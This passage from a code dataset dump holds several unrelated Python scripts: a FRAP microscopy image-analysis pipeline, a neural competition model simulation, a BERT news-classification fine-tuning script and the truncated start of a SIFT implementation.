nuclear_analysis(label_nuclear, organelle_pd, pos)\n\n # calculate nuclear background intensity\n # calculate nuclear without nucleoli region\n label_nuclear_bg = label_nuclear.copy()\n label_nuclear_bg[organelle_before_filter == 1] = 0\n # get label_nuclear_bg_pd\n label_nuclear_bg_pd = pd.DataFrame(regionprops_table(label_nuclear_bg, properties=['label']))\n label_nuclear_bg_pd['mean_intensity'] = ana.get_intensity(label_nuclear_bg, pixels_tseries)\n # assign nuclear background intensity to corresponding nuclear\n nuclear_pd = dat.copy_based_on_index(nuclear_pd, label_nuclear_bg_pd, 'nuclear', 'label',\n ['nuclear_bg_int'], ['mean_intensity'])\n # assign nuclear background intensity to corresponding nucleoli\n organelle_pd = dat.copy_based_on_index(organelle_pd, nuclear_pd, 'nuclear', 'nuclear',\n ['nuclear_bg_int'], ['nuclear_bg_int'])\n\n data_log['num_nucleoli_in_nuclei'] = [len(organelle_pd[organelle_pd['nuclear'] != 0])]\n print(\"Found %d out of %d nucleoli within nuclei.\" % (data_log['num_nucleoli_in_nuclei'][0],\n obj.object_count(organelle)))\n\n# ----------------------------------\n# BLEACH SPOTS DETECTION\n# ----------------------------------\nprint(\"### Image analysis: bleach spots detection ...\")\n\n# load point_and_shoot log file\nlog_pd = pd.read_csv('%s/PointAndShoot.log' % data_path, na_values=['.'], sep='\\t', header=None)\ndata_log['num_aim_spots'] = [len(log_pd)]\nprint(\"Aim to photobleach %d spots.\" % data_log['num_aim_spots'][0])\nlog_pd.columns = ['time', 'aim_x', 'aim_y'] # reformat log_pd\n\n# get bleach_frame\nlog_pd['bleach_frame'] = dat.get_frame(log_pd['time'], acquire_time_tseries)\n\n# get bleach spot coordinate\ncoordinate_pd = ble.get_bleach_spots_coordinates(log_pd, store, cb, data_c, mode_bleach_detection, frap_start_delay)\nlog_pd = pd.concat([log_pd, coordinate_pd], axis=1)\n\n# link pointer with corresponding organelle\nlog_pd['%s' % analyze_organelle] = obj.points_in_objects(label_organelle, log_pd['x'], log_pd['y'])\n\n# calculate distance to organelle boundary\n_, distance_map = medial_axis(organelle, return_distance=True)\ndistance_lst = []\nfor i in range(len(log_pd)):\n distance_lst.append(distance_map[log_pd['y'][i]][log_pd['x'][i]])\nlog_pd['distance'] = distance_lst\n\n# generate bleach spot mask and bleach spots dataframe (pointer_pd)\nbleach_spots, pointer_pd = ble.get_bleach_spots(log_pd, label_organelle, analyze_organelle, num_dilation)\ndata_log['num_bleach_spots'] = [obj.object_count(bleach_spots)]\nprint(\"%d spots passed filters for analysis.\" % data_log['num_bleach_spots'][0])\n\n# add bleach spots corresponding organelle measurements\npointer_pd = dat.copy_based_on_index(pointer_pd, organelle_pd, '%s' % analyze_organelle, '%s' % analyze_organelle,\n ['%s_x' % analyze_organelle, '%s_y' % analyze_organelle,\n '%s_size' % analyze_organelle, '%s_mean_int' % analyze_organelle,\n '%s_circ' % analyze_organelle],\n ['x', 'y', 'size', 'raw_int', 'circ'])\n\nif analyze_organelle == 'nucleoli':\n pointer_pd = dat.copy_based_on_index(pointer_pd, organelle_pd, 'nucleoli', 'nucleoli',\n ['nuclear', 'nuclear_bg_int'], ['nuclear', 'nuclear_bg_int'])\n\n# --------------------------------------------------\n# FRAP CURVE ANALYSIS from bleach spots\n# --------------------------------------------------\nprint(\"### Image analysis: FRAP curve calculation ...\")\n\n# create control spots mask\nctrl_organelle = ~organelle_pd.index.isin(log_pd['%s' % analyze_organelle].tolist())\nctrl_x = organelle_pd[ctrl_organelle]['x'].astype(int).tolist()\nctrl_y 
= organelle_pd[ctrl_organelle]['y'].astype(int).tolist()\nctrl_spots = ana.analysis_mask(ctrl_x, ctrl_y, pix, num_dilation)\nnum_ctrl_spots = obj.object_count(ctrl_spots)\npointer_pd['num_ctrl_spots'] = [num_ctrl_spots] * len(pointer_pd)\n\n# get raw intensities for bleach spots and control spots\npointer_pd['raw_int'] = ana.get_intensity(label(bleach_spots, connectivity=1), pixels_tseries)\nctrl_spots_int_tseries = ana.get_intensity(label(ctrl_spots, connectivity=1), pixels_tseries)\nctrl_pd = pd.DataFrame({'pos': [pos] * num_ctrl_spots, 'ctrl_spots': np.arange(0, num_ctrl_spots, 1),\n 'x': ctrl_y, 'y': ctrl_x, 'raw_int': ctrl_spots_int_tseries})\n\n# link ctrl spots with corresponding organelle\nctrl_pd['%s' % analyze_organelle] = obj.points_in_objects(label_organelle, ctrl_pd['x'], ctrl_pd['y'])\nif analyze_organelle == 'nucleoli':\n ctrl_pd = dat.copy_based_on_index(ctrl_pd, organelle_pd, 'nucleoli', 'nucleoli',\n ['nuclear', 'nuclear_bg_int'], ['nuclear', 'nuclear_bg_int'])\n\nprint(\"### Image analysis: background correction ...\")\n# background intensity measurement\nbg_int_tseries = ana.get_bg_int(pixels_tseries)\npointer_pd['bg_int'] = [bg_int_tseries] * len(pointer_pd)\n\n# background intensity fitting\nbg_fit = mat.fitting_linear(np.arange(0, len(bg_int_tseries), 1), bg_int_tseries)\npointer_pd = dat.add_columns(pointer_pd, ['bg_linear_fit', 'bg_linear_r2', 'bg_linear_a', 'bg_linear_b'],\n [[bg_fit[0]] * len(pointer_pd), [bg_fit[1]] * len(pointer_pd),\n [bg_fit[2]] * len(pointer_pd), [bg_fit[3]] * len(pointer_pd)])\n\n# background correction\n# use original measurement if fitting does not exist\nif np.isnan(bg_fit[2]):\n bg = bg_int_tseries\nelse:\n bg = bg_fit[0]\npointer_pd['bg_cor_int'] = ana.bg_correction(pointer_pd['raw_int'], [bg]*len(pointer_pd))\nctrl_pd['bg_cor_int'] = ana.bg_correction(ctrl_pd['raw_int'], [bg]*len(ctrl_pd))\n\nif analyze_organelle == 'nucleoli':\n pointer_nuclear_bg_pd = pointer_pd[pointer_pd['nuclear_bg_int'] != 'na'].copy().reset_index()\n pointer_nuclear_bg_pd['bg_cor_int'] = ana.bg_correction(pointer_nuclear_bg_pd['raw_int'],\n pointer_nuclear_bg_pd['nuclear_bg_int'])\n ctrl_nuclear_bg_pd = ctrl_pd[ctrl_pd['nuclear_bg_int'] != 'na'].copy().reset_index()\n ctrl_nuclear_bg_pd['bg_cor_int'] = ana.bg_correction(ctrl_nuclear_bg_pd['raw_int'],\n ctrl_nuclear_bg_pd['nuclear_bg_int'])\n\n# filter control traces\nctrl_pd_ft = ble.filter_ctrl(ctrl_pd)\npointer_pd['num_ctrl_spots_ft'] = [len(ctrl_pd_ft)] * len(pointer_pd)\ndata_log['num_ctrl_spots'] = len(ctrl_pd_ft)\n\nif analyze_organelle == 'nucleoli':\n ctrl_nuclear_bg_pd_ft = ble.filter_ctrl(ctrl_nuclear_bg_pd)\n pointer_nuclear_bg_pd['num_ctrl_spots_ft'] = [len(ctrl_nuclear_bg_pd_ft)] * len(pointer_nuclear_bg_pd)\n data_log['num_ctrl_spots_nuclear_bg'] = len(ctrl_nuclear_bg_pd_ft)\n\nprint(\"### Image analysis: photobleaching correction ...\")\n# photobleaching factor calculation\nif len(ctrl_pd_ft) != 0:\n pointer_pd = ble.frap_pb_correction(pointer_pd, ctrl_pd_ft)\n # normalize frap curve and measure mobile fraction and t-half based on curve itself\n frap_pd = ble.frap_analysis(pointer_pd, max_t, acquire_time_tseries, real_time, frap_start_delay,\n frap_start_mode)\n pointer_pd = pd.concat([pointer_pd, frap_pd], axis=1)\n\n # frap curve fitting\n print(\"### Imaging analysis: curve fitting ...\")\n pointer_pd = ble.frap_curve_fitting(pointer_pd)\n pointer_pd['pos'] = [pos] * len(pointer_pd)\n pointer_ft_pd = pointer_pd[pointer_pd['frap_filter_%s' % fitting_mode] == 1]\n data_log['num_frap_curves'] = 
[len(pointer_ft_pd)]\n print(\"%d spots passed filters for FRAP curve quality control.\" % data_log['num_frap_curves'][0])\n\n # --------------------------\n # OUTPUT\n # --------------------------\n print(\"### Export data ...\")\n\n storage_path = save_path\n if not os.path.exists(storage_path):\n os.makedirs(storage_path)\n\n # measurements\n # data_log\n data_log.to_csv('%s/data_log.txt' % storage_path, index=False, sep='\\t')\n # full dataset of all bleach spots\n pointer_pd.to_csv('%s/data_full.txt' % storage_path, index=False, sep='\\t')\n # dataset of control spots\n ctrl_pd.to_csv('%s/data_ctrl.txt' % storage_path, index=False, sep='\\t')\n # dataset of organelle\n organelle_pd.to_csv('%s/data_%s.txt' % (storage_path, analyze_organelle), index=False, sep='\\t')\n\n # images\n dis.plot_offset_map(pointer_pd, fitting_mode, 'bg', storage_path) # offset map\n dis.plot_raw_intensity(pointer_pd, ctrl_pd_ft, fitting_mode, 'bg', storage_path) # raw intensity\n dis.plot_pb_factor(pointer_pd, 'bg', storage_path) # photobleaching factor\n dis.plot_corrected_intensity(pointer_pd, fitting_mode, 'bg', storage_path) # intensity after dual correction\n dis.plot_normalized_frap(pointer_pd, fitting_mode, 'bg', storage_path) # normalized FRAP curves\n # normalized FRAP curves after filtering with fitting\n # individual normalized FRAP curves with fitting\n dis.plot_frap_fitting(pointer_pd, fitting_mode, 'bg', storage_path)\n\nelse:\n # --------------------------\n # OUTPUT\n # --------------------------\n print(\"### Export data ...\")\n\n storage_path = save_path\n if not os.path.exists(storage_path):\n os.makedirs(storage_path)\n # data_log\n data_log.to_csv('%s/data_log.txt' % storage_path, index=False, sep='\\t')\n\nif analyze_organelle == 'nucleoli':\n print(\"### Imaging analysis based on nuclear background: photobleaching correction ...\")\n if len(ctrl_nuclear_bg_pd_ft) != 0:\n pointer_nuclear_bg_pd = ble.frap_pb_correction(pointer_nuclear_bg_pd, ctrl_nuclear_bg_pd_ft)\n # normalize frap curve and measure mobile fraction and t-half based on curve itself\n frap_nuclear_bg_pd = ble.frap_analysis(pointer_nuclear_bg_pd, max_t, acquire_time_tseries, real_time,\n frap_start_delay, frap_start_mode)\n pointer_nuclear_bg_pd = pd.concat([pointer_nuclear_bg_pd, frap_nuclear_bg_pd], axis=1)\n\n # frap curve fitting\n print(\"### Imaging analysis based on nuclear background: curve fitting ...\")\n pointer_nuclear_bg_pd = ble.frap_curve_fitting(pointer_nuclear_bg_pd)\n pointer_nuclear_bg_pd['pos'] = [pos] * len(pointer_nuclear_bg_pd)\n pointer_nuclear_bg_ft_pd = pointer_nuclear_bg_pd[pointer_nuclear_bg_pd['frap_filter_%s' % fitting_mode] == 1]\n data_log['num_frap_curves_nuclear_bg'] = [len(pointer_nuclear_bg_ft_pd)]\n print(\"%d spots passed filters for FRAP curve quality control.\" % data_log['num_frap_curves_nuclear_bg'][0])\n\n # --------------------------\n # OUTPUT\n # --------------------------\n print(\"### Export data ...\")\n\n # measurements\n # data_log\n data_log.to_csv('%s/data_log.txt' % storage_path, index=False, sep='\\t')\n # dataset of nuclear\n nuclear_pd.to_csv('%s/data_nuclear.txt' % storage_path, index=False, sep='\\t')\n # dataset of nuclear background corrected FRAP data\n pointer_nuclear_bg_pd.to_csv('%s/data_full_nuclear_bg.txt' % storage_path, index=False, sep='\\t')\n\n # images\n dis.plot_offset_map(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path) # offset map\n # raw intensity\n dis.plot_raw_intensity(pointer_nuclear_bg_pd, ctrl_nuclear_bg_pd_ft, 
fitting_mode, 'nuclear_bg', storage_path)\n dis.plot_pb_factor(pointer_nuclear_bg_pd, 'nuclear_bg', storage_path) # photobleaching factor\n # intensity after dual correction\n dis.plot_corrected_intensity(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path)\n # normalized FRAP curves\n dis.plot_normalized_frap(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path)\n # normalized FRAP curves after filtering with fitting\n # individual normalized FRAP curves with fitting\n dis.plot_frap_fitting(pointer_nuclear_bg_pd, fitting_mode, 'nuclear_bg', storage_path)\n\n# --------------------------\n# OUTPUT DISPLAY\n# --------------------------\nif display_mode == 'Y':\n print(\"### Output display ...\")\n\n with napari.gui_qt():\n # embed mpl widget in napari viewer\n mpl_widget = FigureCanvas(Figure(figsize=(5, 3)))\n [ax1, ax2, ax3] = mpl_widget.figure.subplots(nrows=1, ncols=3)\n viewer = napari.Viewer()\n viewer.window.add_dock_widget(mpl_widget)\n\n # napari display\n # Layer1: data\n # display time series movies in napari main viewer\n mov = dis.napari_movie(store, cb)\n viewer.add_image(mov, name='data')\n\n if (analyze_organelle == 'nucleoli') & (np.amax(label_nuclear) > 0):\n # Layer2: nuclear\n # display labeled nuclei\n cmap1 = 'winter'\n cmap1_woBg = dis.num_color_colormap(cmap1, np.amax(label_nuclear))[0]\n viewer.add_image(label_nuclear, name='nuclear', colormap=('winter woBg', cmap1_woBg))\n\n # Layer3: organelle\n # display organelle mask (violet)\n violet_woBg = Colormap([[0.0, 0.0, 0.0, 0.0], [129 / 255, 55 / 255, 114 / 255, 1.0]])\n viewer.add_image(organelle, name=('%s' % analyze_organelle), contrast_limits=[0, 1],\n colormap=('violet woBg', violet_woBg))\n\n # Layer3: aim points\n # display aim points from .log file (red)\n points = np.column_stack((log_pd['aim_y'].tolist(), log_pd['aim_x'].tolist()))\n size = [3] * len(points)\n viewer.add_points(points, name='aim points', size=size, edge_color='r', face_color='r')\n\n # Layer4: analysis spots\n # display bleach spots, color sorted based on corresponding nucleoli size\n # sort colormap based on analysis spots filtered\n if len(pointer_pd) != 0:\n cmap2 = 'winter'\n cmap2_rgba = dis.num_color_colormap(cmap2, len(pointer_pd))[2]\n if display_sort == 'na':\n cmap2_napari = dis.num_color_colormap(cmap2, len(pointer_pd))[0]\n else:\n cmap2_napari = dis.sorted_num_color_colormap(cmap2_rgba, pointer_pd,\n '%s' % display_sort,\n 'bleach_spots')[0]\n viewer.add_image(label(bleach_spots), name='bleach spots', colormap=('winter woBg', cmap2_napari))\n\n # matplotlib display\n if display_data == 'bg':\n if len(ctrl_pd_ft) != 0:\n if display_sort == 'na':\n pointer_sort = pointer_pd\n else:\n # sorted based on feature (color coded)\n # from small to large\n pointer_sort = \\\n pointer_pd.sort_values(by='%s' % display_sort).reset_index(drop=True)\n else:\n if len(ctrl_nuclear_bg_pd_ft) != 0:\n if display_sort == 'na':\n pointer_sort = pointer_nuclear_bg_pd\n else:\n # sorted based on feature (color coded)\n # from small to large\n pointer_sort = \\\n pointer_nuclear_bg_pd.sort_values(by='%s' % display_sort).reset_index(drop=True)\n\n if ((display_data == 'bg') & (len(ctrl_pd_ft) != 0)) | ((display_data == 'local')\n & (len(ctrl_nuclear_bg_pd_ft) != 0)):\n # Plot-left: FRAP curves of filtered analysis spots after intensity correction (absolute intensity)\n for i in range(len(pointer_sort)):\n ax1.plot(pointer_sort['mean_int'][i], color=cmap2_rgba[i + 1])\n ax1.set_title('FRAP curves')\n ax1.set_xlabel('time')\n 
ax1.set_ylabel('intensity')\n\n # Plot-middle: FRAP curves of filtered analysis spots after intensity correction\n # relative intensity, bleach time zero aligned\n for i in range(len(pointer_sort)):\n if pointer_sort['frap_filter_%s' % fitting_mode][i] == 1:\n ax2.plot(pointer_sort['real_time_post'][i], pointer_sort['int_curve_post_nor'][i],\n color=cmap2_rgba[i + 1], alpha=0.5)\n ax2.plot(pointer_sort['real_time_post'][i], pointer_sort['%s_fit' % fitting_mode][i], '--',\n color=cmap2_rgba[i + 1])\n ax2.set_title('FRAP curves')\n ax2.set_xlabel('time (sec)')\n ax2.set_ylabel('intensity')\n\n # Plot-right: offset\n if mode_bleach_detection == 'single-offset':\n for i in range(len(pointer_sort)):\n ax3.plot([0, pointer_sort['x_diff'][i]], [0, pointer_sort['y_diff'][i]],\n color=cmap2_rgba[i + 1])\n ax3.set_xlim([-10, 10])\n ax3.set_ylim([-10, 10])\n ax3.set_title('Offset map')\n ax3.set_xlabel('x offset')\n ax3.set_ylabel('y offset')\n","sub_path":"test/frap_analysis_nuclear-bg.py","file_name":"frap_analysis_nuclear-bg.py","file_ext":"py","file_size_in_byte":25425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506915786","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nEyeLinkSession.py\n\nCreated by Tomas Knapen on 2011-04-27.\nCopyright (c) 2011 __MyCompanyName__. All rights reserved.\n\"\"\"\n\nimport os, sys, pickle, math, thread, time\nfrom subprocess import *\n\nimport scipy as sp\nimport scipy.stats as stats\nimport numpy as np\nimport matplotlib.pylab as pl\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom IPython import embed as shell\n\nfrom tables import *\nimport pp\n\nfrom DataContainer import DataContainer\nfrom DataAnalyzer import DataAnalyzer\n\ndef simpleaxis(ax):\n\tax.spines['top'].set_visible(False)\n\tax.spines['right'].set_visible(False)\n\tax.get_xaxis().tick_bottom()\n\tax.get_yaxis().tick_left()\n\t\ndef spine_shift(ax, shift = 10):\n\tfor loc, spine in ax.spines.iteritems():\n\t\tif loc in ['left','bottom']:\n\t\t\tspine.set_position(('outward', shift)) # outward by 10 points\n\t\telif loc in ['right','top']:\n\t\t\tspine.set_color('none') # don't draw spine\n\t\telse:\n\t\t\traise ValueError('unknown spine location: %s'%loc)\n\n\nnr_variables = 5\n\ndef npS( input, mu ):\n\tinput[input < 0] = 0.0\n\tinput = pow(input,mu['NRa'])/(pow(input,mu['NRa']) + pow(mu['NRs'],mu['NRa']))\n\ndef func(t, y, mu):\n\timport pygsl._numobj\n\tfrom pygsl import odeiv, Float\n\tfrom numpy.random import randn\n\t\n\tdef S( input, NRa, NRs ):\n\t\tif input >= 0. :\n\t\t\t return pow(input,NRa)/(pow(input,NRa) + pow(NRs,NRa))\n\t\telse:\n\t\t\treturn 0.\n\t\n\tdydt = pygsl._numobj.zeros((5,), Float) * 1.0\n\t\n\t#defining variables based on indices on y\n\tH1, H2 = 0,1\n\tA1, A2 = 2,3\n\tC = 4\n\t\n\t# dydt[H1] = mu['XL'] - (1. + y[A1]) * y[H1] + mu['beta'] * y[A1] - mu['gamma'] * S(y[H2], mu['NRa'], mu['NRs']);\n\t# dydt[H2] = mu['XR'] - (1. + y[A2]) * y[H2] + mu['beta'] * y[A2] - mu['gamma'] * S(y[H1], mu['NRa'], mu['NRs']);\n\t\n\tdydt[H1] = mu['XL'] - (1. + y[A1]) * y[H1] + mu['beta'] * y[A1] - mu['gamma'] * (mu['var_inh_noise_infl'] * y[C] + 1.0) * S(y[H2], mu['NRa'], mu['NRs']);# - mu['var_inh_infl'] * S(y[C], mu['NRa_var_inh'], mu['NRs_var_inh']);\n\tdydt[H2] = mu['XR'] - (1. 
+ y[A2]) * y[H2] + mu['beta'] * y[A2] - mu['gamma'] * (mu['var_inh_noise_infl'] * y[C] + 1.0) * S(y[H1], mu['NRa'], mu['NRs']);# - mu['var_inh_infl'] * S(y[C], mu['NRa_var_inh'], mu['NRs_var_inh']);\n\tdydt[A1] = ( -pow(y[A1],mu['exponent']) + ( mu['alpha'] * S(y[H1], mu['NRa'], mu['NRs']) ) ) / mu['tau'];\n\tdydt[A2] = ( -pow(y[A2],mu['exponent']) + ( mu['alpha'] * S(y[H2], mu['NRa'], mu['NRs']) ) ) / mu['tau'];\n\tdydt[C] = (randn(1) * mu['var_inh_noise_level'] - y[C]) / mu['tau_inh']\n\t\n\treturn dydt\n\ndef run_sim(mu, nr_timepoints, func, npS):\n\timport pygsl._numobj\n\timport pygsl\n\tfrom pygsl import odeiv, Float\n\timport numpy\n\t\n\tdimension = 5\n\tstep = odeiv.step_rkf45(dimension, func, None, mu)\n\tcontrol = odeiv.control_y_new(step, 1e-6, 1e-6)\n\tevolve = odeiv.evolve(step, control, dimension)\n\t\n\th = 1\n\tt1 = float(nr_timepoints)\n\t# initial values - all 0.\n\ty = pygsl._numobj.array((0.5, 0.5, 0.0, 0.01, 0.0))\n\t\n\top = numpy.zeros((nr_timepoints, dimension))\n\titers = 0\n\tfor t in numpy.linspace(0, t1, nr_timepoints):\n\t\tt, h, y = evolve.apply(t, t1, h, y)\n\t\top[iters] = y\n\t\t# add noise to instantaneous activity:\n\t\t# y += numpy.concatenate((numpy.random.randn(2) * mu['noise_level'], [0.0, 0.0, 0.0]))\n\t\t# add noise to novel interaction\n\t\t# y += numpy.concatenate(([0.0, 0.0, 0.0, 0.0], numpy.random.randn(1) * mu['noise_level']))\n\t\t# add noise to activities and to novel interaction\n\t\t# y += numpy.array([numpy.random.randn(1) * mu['noise_level'] * mu['var_inh_noise_infl']/y[4], numpy.random.randn(1) * mu['noise_level'] * mu['var_inh_noise_infl']/y[4], 0.0, 0.0, y[4] * numpy.random.randn(1) * mu['var_inh_noise_level']])\n\t\t# add noise only to novel interaction, but graded by the inverse of its value.\n\t\t# y += numpy.concatenate(([0.0, 0.0, 0.0, 0.0], numpy.random.randn(1) * mu['noise_level']))\n\t\t# add noise to both populations and transient signal\n\t\ty += numpy.array([numpy.random.randn(1) * mu['noise_level'], numpy.random.randn(1) * mu['noise_level'], 0.0, 0.0, 0.0])\n\t\t\n\t\titers += 1\n\t\n\top = numpy.array(op)\n\t# naka rushton on activities:\n\tnpS(op[:,0], mu)\n\tnpS(op[:,1], mu)\n\t# return both output and parameter dictionary\n\treturn [mu, op]\n\n# mu parameters based on dictionary\nmu = {'XL': 1.0, 'XR': 1.0, 'beta': 0.24, 'gamma': 3.0, 'exponent': 1.0, 'alpha': 3.0, 'tau': 100.0, 'NRa': 2.0, 'NRs': 1.0, 'noise_level': 0.0025, 'var_inh': 120.0, 'tau_inh': 50, 'var_inh_infl': 0.8, 'NRa_var_inh': 3.0, 'NRs_var_inh': 1.0, 'var_inh_noise_level': 0.005, 'var_inh_noise_infl': 0.0}\nnr_timepoints = 20000\nfile_name = 'data/C_noise_no_transition'\n\ncorr_res = np.zeros((4,4,8,6))\npnl_range = np.linspace(0.0001, 0.0003, corr_res.shape[0])\ninl_range = np.linspace(0.001, 0.01, corr_res.shape[1])\n\nsimulate = True \n\nfor i, population_noise_level in enumerate(pnl_range):\n\tfor j, inhibition_noise_level in enumerate(inl_range):\n\t\tmu['var_inh_noise_level'] = inhibition_noise_level\n\t\tmu['noise_level'] = population_noise_level\n\t\t\n\t\trn = 'pnl' + '_' + str(population_noise_level) + '_inl' + '_' + str(inhibition_noise_level)\n\t\t\n\t\twhich_var = 'var_inh_infl'\n\t\twhich_values = np.linspace(0.00,7.5,corr_res.shape[2])\n\t\t\n\t\t# Create an instance of callback class\n\t\tnr_simulations = which_values.shape[0]\n\t\tdc = DataContainer(file_name + '.hdf5') \n\t\tda = DataAnalyzer(dc)\n\t\tif simulate:\n\t\t\tdc.setup_for_simulation(nr_timepoints = nr_timepoints, nr_simulations = nr_simulations, nr_variables = 
nr_variables)\n\t\t\t# running these in parallel\n\t\t\t# Creates jobserver with automatically detected number of workers\n\t\t\tjob_server = pp.Server(ppservers=())\n\t\t\n\t\t\t# Execute the same task with different amount of active workers and measure the time\n\t\t\tfor index in xrange(nr_simulations):\n\t\t\t\tmu[which_var] = which_values[index]\n\t\t\t\tjob_server.submit(run_sim, (mu, nr_timepoints, func, npS), callback=dc.save_to_array)\n\t\t\t#wait for jobs in all groups to finish \n\t\t\tjob_server.wait()\n\t\t\tjob_server.destroy()\n\t\t\n\t\t\tdc.save_to_hdf_file(run_name = rn.replace('.',''))\n\t\t\tda.plot_activities(plot_file_name = file_name + '_act_' + rn + '.pdf', run_name = rn.replace('.',''), sort_variable = which_var)\n\t\t\n\t\tda.all_time_courses_to_percepts(run_name = rn.replace('.',''), sort_variable = which_var, plot_file_name = file_name + '_' + rn + '.pdf')\n\t\tcorr_res[i,j,:,:] = da.correlation_results\n\t\t\n\t# fig = pl.figure()\n\t# ax = fig.add_subplot(111)\t\n\t# cax = ax.imshow(corr_res[i], extent = (which_values[0],which_values[-1],inl_range[0],inl_range[-1]), vmin = 0, vmax = 1)\n\t# cbar = fig.colorbar(cax, ticks=[0, 0.5, 1])\n\t# cbar.ax.set_yticklabels(['0', '0.5', '1'])# vertically oriented colorbar\n\t# ax.set_ylabel('inhibition noise level', fontsize=9)\n\t# ax.set_xlabel('variable inhibition strength', fontsize=9)\n\t# pl.savefig('data/im_' + str(population_noise_level) + '.pdf')\n\t# pl.close()\n\n# # for a run of 1x10:\n# cr_m = corr_res.squeeze().mean(axis = 0)\n# cr_s = corr_res.squeeze().std(axis = 0) / math.sqrt(10)\n# \n# \n# f2 = pl.figure(figsize = (8,4))\n# s = f2.add_subplot(111) # , aspect = 'equal')\n# # s.set_title('simulation results\\ncorrelations between C and percept duration\\nfor %s' % sort_variable)\n# s.set_xlabel('Strength of transient signal [C] influence')\n# s.set_ylabel('Spearman\\'s $\\rho$')\n# s.axhline(0,-0.5,8.0, linewidth = 0.25)\n# s.plot(which_values, cr_m[:,0], 'k--', label = 'percept duration / C')\n# s.plot(which_values, cr_m[:,2], 'b--', label = 'percept duration / $\\sigma$ H')\n# s.plot(which_values, cr_m[:,4], 'r--', label = '$\\sigma$ H / C')\n# \n# pl.fill_between(which_values, cr_m[:,0] + cr_s[:,0], cr_m[:,0] - cr_s[:,0], color = 'k', alpha = 0.2)\n# pl.fill_between(which_values, cr_m[:,2] + cr_s[:,2], cr_m[:,2] - cr_s[:,2], color = 'b', alpha = 0.2)\n# pl.fill_between(which_values, cr_m[:,4] + cr_s[:,4], cr_m[:,4] - cr_s[:,4], color = 'r', alpha = 0.2)\n# s.axis([-0.5,8.0, -1, 1])\n# \n# leg = s.legend(fancybox = True)\n# leg.get_frame().set_alpha(0.5)\n# if leg:\n# \tfor t in leg.get_texts():\n# \t    t.set_fontsize('x-small') # the legend text fontsize\n# \tfor l in leg.get_lines():\n# \t    l.set_linewidth(3.5) # the legend line width\n# simpleaxis(s)\n# spine_shift(s)\n# pl.savefig(file_name + '_corr.pdf')\n# \n\n# shell()","sub_path":"versions/low_pass_noise.py","file_name":"low_pass_noise.py","file_ext":"py","file_size_in_byte":8115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"124733466","text":"#knock89.py\nimport transformers\nfrom transformers import BertTokenizer, BertModel\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n# minimal stand-ins for helpers defined in earlier knocks of this repo (assumed behaviour):\ncat = str.maketrans('btem', '0123')  # label letters -> class ids; assumes the News Aggregator categories b/t/e/m\n\ndef ids2tensor(ids_list, max_len):\n    # pad/truncate every encoded sentence to max_len; pad id 0 keeps the mask built in Bert.forward valid\n    padded = [ids[:max_len] + [0] * (max_len - min(len(ids), max_len)) for ids in ids_list]\n    return torch.tensor(padded, dtype = torch.int64)\n\ndef create_data(x, y):\n    # wrap feature/label tensors so they can be fed to DataLoader\n    return TensorDataset(x, y)\n\ndef calc_accuracy(pred_labels, targets):\n    # fraction of correct predictions\n    return (pred_labels.cpu() == targets.cpu()).float().mean().item()\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nmax_len = 20\n\ndef create_dataset(file_name):\n    with open(file_name, encoding=\"utf-8\") as f:\n        x_vec=[]\n        y_vec=[]\n        for line in f:\n            y, sent = line.strip().split('\t')\n            x_vec.append(tokenizer.encode(sent, add_special_tokens=True))\n            y_vec.append(int(y.translate(cat)))\n        x_vec = ids2tensor(x_vec, 
max_len)\n y_vec = torch.tensor(y_vec, dtype = torch.int64)\n return x_vec, y_vec\n\nclass Bert(nn.Module):\n def __init__(self, output_size=4):\n super().__init__()\n self.bert_model = BertModel.from_pretrained('bert-base-uncased', return_dict=False)\n self.dropout = torch.nn.Dropout(0.3)\n self.fc = torch.nn.Linear(768, output_size)\n \n def forward(self, ids):\n seg_ids = torch.zeros_like(ids)\n mask = (ids > 0)\n _, out = self.bert_model(input_ids = ids, token_type_ids = seg_ids, attention_mask=mask)\n out = self.fc(self.dropout(out))\n return out\n\ndevice = torch.device('cuda')\nmodel = Bert()\nx_train, y_train = create_dataset(r'/content/drive/MyDrive/Dataset/train.txt')\nx_test, y_test = create_dataset(r'/content/drive/MyDrive/Dataset/test.txt')\ndataset = create_data(x_train, y_train)\ntrain_loader = DataLoader(dataset, batch_size = 64, shuffle = True)\noptim = torch.optim.AdamW(model.parameters(), lr=0.0001)\nloss_func = nn.CrossEntropyLoss()\ntrain_accuracy = []\ntest_accuracy = []\ntrain_loss = []\ntest_loss = []\nfor epoch in tqdm(range(5)):\n for inputs, target in train_loader:\n optim.zero_grad()\n model.to(device)\n inputs = inputs.to(device)\n target = target.to(device)\n outputs = model(inputs)\n loss = loss_func(outputs, target)\n loss.backward()\n optim.step()\n with torch.no_grad():\n x_train = x_train.to(device)\n x_test = x_test.to(device)\n pred = model(x_train)\n train_accuracy.append(calc_accuracy(torch.argmax(pred, dim=1), y_train))\n train_loss.append(loss_func(pred, y_train.to(device)).detach().cpu().numpy())\n pred = model(x_test)\n test_accuracy.append(calc_accuracy(torch.argmax(pred, dim=1), y_test))\n test_loss.append(loss_func(pred, y_test.to(device)).detach().cpu().numpy())\n\nplt.figure(figsize=(20, 10))\nplt.subplot(1,2,1)\nplt.plot(train_accuracy, label='train')\nplt.plot(test_accuracy, label='test')\nplt.subplot(1,2,2)\nplt.plot(train_loss, label='train')\nplt.plot(test_loss, label='test')\nplt.show()","sub_path":"ueda/chapter09/knock89.py","file_name":"knock89.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"493667700","text":"import cv2\nimport numpy as np\n\ndef SIFT(src, thresh, r):\n s = 1.3 #초기 sigma\n a = 3. #극점을 찾을 이미지 수\n k = 2. 
